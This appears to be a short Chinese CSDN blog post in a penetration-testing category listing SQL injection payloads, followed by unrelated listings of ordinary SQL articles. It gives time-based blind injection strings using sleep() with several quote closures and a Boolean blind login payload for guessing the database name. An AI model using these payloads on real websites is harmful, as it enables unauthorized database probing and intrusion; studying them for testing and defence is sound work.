sql 方法实例

最新推荐文章于 2022-09-12 18:59:06 发布
最新推荐文章于 2022-09-12 18:59:06 发布
阅读量113 收藏
点赞数
分类专栏: 安全渗透 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54472394/article/details/125092845
版权

文章目录

提示:

一、没有任何报错的时候 if([条件],[true],[false])

?id = 1 and sleep(3) --+   # 没有任何报错的时候

?id = 1' and sleep(3) --+
?id = 1') and sleep(3) --+
?id = 1 " and sleep(3) --+

 # 下面更改闭合方式

结合 if 使用
?id = 1 and if(length(database()) > 1 , sleep(3),1) --+   # 没有任何报错的时候

二,通过 post 抓包 进行Boole盲注(猜库)

输入账号密码 使用bp 抓包
在这里插入图片描述

在这里插入图片描述

1.进行Boole盲注(猜库)

uname=zhao'  or   length(database())>1 --+
兰兰不懒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
当逻辑判断与或连用时——先与后或
RunUpwind的专栏
06-30 4800
刚才在论坛看帖:http://community.csdn.net/Expert/topic/5629/5629827.xml?temp=.544018遇到一个问题,当逻辑判断句中与或连用,又没加括号,执行的顺序会是怎样的呢?如:        false && false || true 这 个逻辑判断的最终结果应该是什么呢?以前认为与或的优先级相同,当它们连用时,我总是加上括号,不加括号时
SQL 经典实例
05-09
SQL(Structured Query Language)是用于管理和处理关系数据库的标准编程语言,它被广泛应用于数据查询...在“SQL经典实例.pdf”中,你将找到更具体的问题解决方法和示例,这将有助于你在实际工作或学习中提升SQL技能。
关于sql中的if条件判断符 并且和或的表达
chencai56的博客
05-23 3万+
今天写sql语句,然后碰到要同时判断两个条件的if语句,瞬间想起c#中肯定是if(id>0&&id<40)和 if(id>0||id<40)等的判断但是sql中这样写很显然会报错,经过查找才知道sql中的写法是if @id>0 and @id<40   或者 if @id>0 or @id<40 语法不一样,朋友们千万别写错了...
SQL server where if or 条件判断
qq_35363155的博客
05-26 2万+
select fno,fname,remark1from t_base where fparentid='159' or  fparentid='169'order by cast(remark1 as int)asc得到的结果为两组数据同时显示,想要达到某种条件下显示其中一个网上较好方法为WHERE IF(  `parentID` =1,  `plan_id` <10,  `plan_id...
mybatis动态sql在and条件中嵌套or条件的写法。
看不过的黑工坊
10-27 5万+
sql如下: select * FROM T_CORRECT_END t  INNER JOIN GET_CHILD_DEPT(579) a  on t.DEPT_PK=a.PK_ID WHERE t.DR = 0 AND a.DR = 0 AND t.VSTATUS >= 1   and (t.XM like '%张%' or t.ZJHM = '张' or t.MOBILE_PHO
使用动态SQL中的if标签做条件判断的几种用法和注意点
李猿猿的博客
07-18 7592
使用中踩到的坑记录一下(大神请略过,我只是个菜菜,忽喷!!!万分感谢!!!) <mapper namespace="dynamic"> <resultMap id="userMap" type="com.soft.test.model.User"> <id column="id" property="id"/> <result column="username" property="username"/>
从python读取sql实例方法
12-17
从python读取sql方法: 1、利用python内置的open函数读入sql文件; 2、利用第三方库pymysql中的connect函数连接mysql服务器; 3、利用第三方库pandas中的read_sql方法读取传入的sql文件即可。 python 直接读取 sql...
sql server多行数据拼接的实例方法
01-19
1.表结构id type productCode1 铅笔 00012 铅笔 00023 铅笔 00034 钢笔 00045 钢笔 00056 钢笔 00047 圆珠笔 00078 圆珠笔 00089 圆珠笔 00072.自定义函数fun 代码如下:GO/****** Object: ...
mybatis防止SQL注入的方法实例详解
08-27
MyBatis 防止 SQL 注入的方法实例详解 SQL 注入是一种简单的攻击手段,但直到今天仍然十分常见。MyBatis 作为一个流行的持久层框架,如何防止 SQL 注入呢?下面我们将详细介绍 MyBatis 防止 SQL 注入的方法实例详解...
实例讲解SQL注入攻击
02-26
SQL注入”是一种利用未过滤/未审核用户输入的攻击方法(“缓存溢出”和这个不同),意思就是让应用运行本不应该运行的SQL代码。如果应用毫无防备地创建了SQL字符串并且运行了它们,就会造成一些出人意料的结果。本...
2108-04动态sql
weixin_61407147的博客
05-03 390
java
mybatis中的语句应用--sql的多重if条件句--sql的时间转换--多字段对应同一张表同一字段连接处理--or语句的应用--sql中根据某字段值让另一个字段显示不同的值--多条插入
xcc1974494的博客
06-28 1451
<select id="pageDocReceiveSend" resultType="com.tzsw.afms.biz.dto.DocReceiveSendDto"> select d.id, d.doc_state, d.doc_receive_num, d.doc_receive_time, d.doc_receive_dept, .
PL/SQL IF判断
weixin_42051619的博客
06-07 3019
PLSQL
SQl语句用or连接条件
Whx123A的博客
09-12 1126
sql语句
SQL Server 学习(2)IF语句、多条件判断(CASE)、删除表中数据(Truncate)、AND 或是 OR 条件链接
Java_c#
03-08 8713
一、IF语句 declare @a varchar(20),@b varchar(20); --变量 set @a='1'; --给变量赋值 set @b='1'; if @a=@b begin print('IF语句'); end 或 if (条件)    begin           end else if (条件)    begin    end el
sql中的 IF 条件语句的用法
热门推荐
霓虹深处
05-25 32万+
IF 表达式 IF( expr1 , expr2 , expr3 ) expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 如下: SELECT IF(TRUE,1+1,1+2); -> 2 SELECT IF(FALSE,1+1,1+2); -> 3 SELECT IF(STRCMP("111","222"),"...
sql union all的使用方法举例
最新发布
07-12
当我们有两个表,`users`和`customers`,并且想要将它们的数据合并为一个结果集,可以使用`UNION ALL`操作符。 举例1:合并两个表的所有记录 ```sql SELECT name, age FROM users UNION ALL SELECT name, age FROM customers; ``` 以上查询将返回包含`users`表和`customers`表所有记录的结果集,结果集中的列名和数据类型需要保持一致。 举例2:合并两个表的部分记录 ```sql SELECT name, age FROM users WHERE age > 20 UNION ALL SELECT name, age FROM customers WHERE age > 30; ``` 以上查询将返回满足条件的`users`表和`customers`表的记录,合并为一个结果集。 需要注意的是,`UNION ALL`不会去重,如果需要去重,请使用`UNION`操作符。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值